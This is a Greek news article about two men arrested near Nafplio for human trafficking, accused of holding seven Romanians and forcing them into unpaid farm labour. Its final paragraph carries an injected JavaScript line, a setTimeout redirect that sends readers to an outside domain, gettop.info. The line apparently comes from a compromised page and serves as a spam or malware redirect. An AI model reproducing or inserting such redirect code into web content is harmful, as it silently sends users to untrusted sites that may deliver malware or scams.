Για εμπορία ανθρώπων κατηγορούνται δύο Έλληνες – Κρατούσαν 7 Ρουμάνους

0
6

 

Για εμπορία ανθρώπων κατηγορούνται δύο Έλληνες, που συνελήφθησαν σε κοινότητα του Δήμου Ναυπλιέων Αργολίδας, κατηγορούμενοι ότι κρατούσαν παράνομα επτά Ρουμάνους εξαναγκάζοντάς τους σε αγροτικές εργασίες.

Πέρα από τους δύο συλληφθέντες, ηλικίας 59 και 29 ετών, αναζητούνται ένας 35χρονος Έλληνας και ένας 27χρονος Ρουμάνος.

Ειδικότερα, έπειτα από την αξιολόγηση στοιχείων που είχαν συγκεντρώσει αστυνομικοί του τμήματος Ασφαλείας Ναυπλίου και σε συνεργασία με την υποδιεύθυνση Αντιμετώπισης Οργανωμένου Εγκλήματος της Διεύθυνσης Αστυνομίας Θεσσαλονίκης, διαπιστώθηκε ότι από τις αρχές Δεκεμβρίου, ο 27χρονος Ρουμάνος μαζί με συμπατριώτη του, εκμεταλλευόμενοι την κακή οικονομική κατάσταση των επτά ομοεθνών τους και με το πρόσχημα της εξεύρεσης εργασίας στην Ελλάδα, τους οδήγησαν σε τοπική κοινότητα του δήμου Ναυπλιέων. Εκεί τους παρέδωσαν στους τρεις Έλληνες, οι οποίοι, σύμφωνα με την Αστυνομία, τους απειλούσαν, τους κρατούσαν τα ταξιδιωτικά τους έγγραφ, και τους εξανάγκαζαν να πραγματοποιούν αγροτικές εργασίες χωρίς να τους καταβάλουν αμοιβή.

Οι συλληφθέντες θα οδηγηθούν στον εισαγγελέα Πλημμελειοδικών Ναυπλίου, ενώ οι αστυνομικοί του τμήματος Ασφαλείας Ναυπλίου συνεχίζουν τις έρευνες για την υπόθεση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here